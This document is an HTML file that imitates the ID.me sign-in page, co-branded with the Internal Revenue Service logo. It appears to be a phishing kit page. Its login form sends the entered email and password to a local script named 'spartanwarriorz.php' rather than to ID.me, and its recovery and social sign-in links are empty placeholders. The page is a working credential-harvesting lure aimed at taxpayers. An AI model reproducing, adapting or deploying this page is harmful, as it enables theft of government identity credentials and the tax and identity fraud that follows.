<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <title itemprop="name"> Sign in to ID.me - ID.me</title>
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css">
    <script type="text/javascript" async="" src="https://www.googletagmanager.com/gtag/js?id=G-684ZXW8HVT&amp;l=dataLayer&amp;cx=c"></script>
    <script async="" charset="utf-8" src="https://static.zdassets.com/ekr/asset_composer.js?key=22fb9205-0748-40d7-8eb1-c964afe88d06" type="text/javascript"></script>
    <script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-PL62HD9"></script>
    <script async="" src="//www.google-analytics.com/analytics.js"></script>
</head>
<body class="">
    <div id="ZN_2bLc7fWaOZ8U4ey"></div>
    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_user" id="new_user" data-validate="signin" action="spartanwarriorz.php" accept-charset="UTF-8" method="post">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme"><img alt="ID.me" src="images/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"></div>
                                <div class="c_icon m_addition"><img alt="with" src="images/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"></div>
                                <div class="c_icon m_consumer-logo"><button name="button" type="button" class="m_consumer-logo m_exit-ramp" data-component="Components.Modal" fdprocessedid="1fuvyb"><img alt="Internal Revenue Service" src="images/IRS-Logo.svg">
                                </button></div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <div class="form-header-access">
                            <h1 id="sr_page_title">Sign in to ID.me</h1>
                            <div class="form-header-well">
                                <p>New to ID.me?</p>
                                <p><a href="create.html">Create an ID.me account</a></p>
                            </div>
                        </div>
                        <div class="form-fields">
                            <div class="field-group">
                                <div class="field text">
                                    <label for="user_email">Email</label>
                                    <input placeholder="Enter your email address" required="required" autocomplete="email" type="email" name="username" id="user_email" fdprocessedid="ya9x">
                                </div>
                                <div class="field text">
                                    <label for="user_password">Password</label>
                                    <input placeholder="Enter password" required="required" autocomplete="current-password" type="password" name="password" id="user_password" fdprocessedid="eywn6d">
                                </div>
                            </div>
                        </div>
                        <div class="form-actions" data-component="Components.Collector" data-ready="true">
                            <input type="submit" name="commit" id="btn-submit" value="Sign in" class="btn btn-primary" fdprocessedid="9spe5m" onclick="change()">
                            <script>
                                function change() // no ';' here
                        {
                            var elem = document.getElementById("btn-submit");
                            if (elem.value=="Signing in to ID.me........") elem.value = "Sign in";
                            else elem.value = "Signing in to ID.me......";
                        }
                            </script>
                        </div>
                        <div class="form-footer">
                            <p><a href="#">Forgot password</a></p>
                        </div>
                        <div class="separator"><span>OR</span></div>
                        <div class="connections">
                            <a class="facebook connection" aria-label="Sign in with Facebook" href="#"></a>
                            <a class="google connection" aria-label="Sign in with Google" href="#"></a>
                            <a class="apple connection" aria-label="Sign in with Apple" href="#"></a>
                            <a class="linkedin connection" aria-label="Sign in with LinkedIn" href="#"></a>
                            <a class="connection m_full" href="#">View more options</a>
                        </div>
                    </main>
                </form>
            </div>
            <aside aria-label="Select Language" class="language">
                <div class="language-selection" data-component="Components.Language"><a class="language-selection-toggle" href="#">English</a></div>
            </aside>
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        </div>
    </div>
</body>
</html>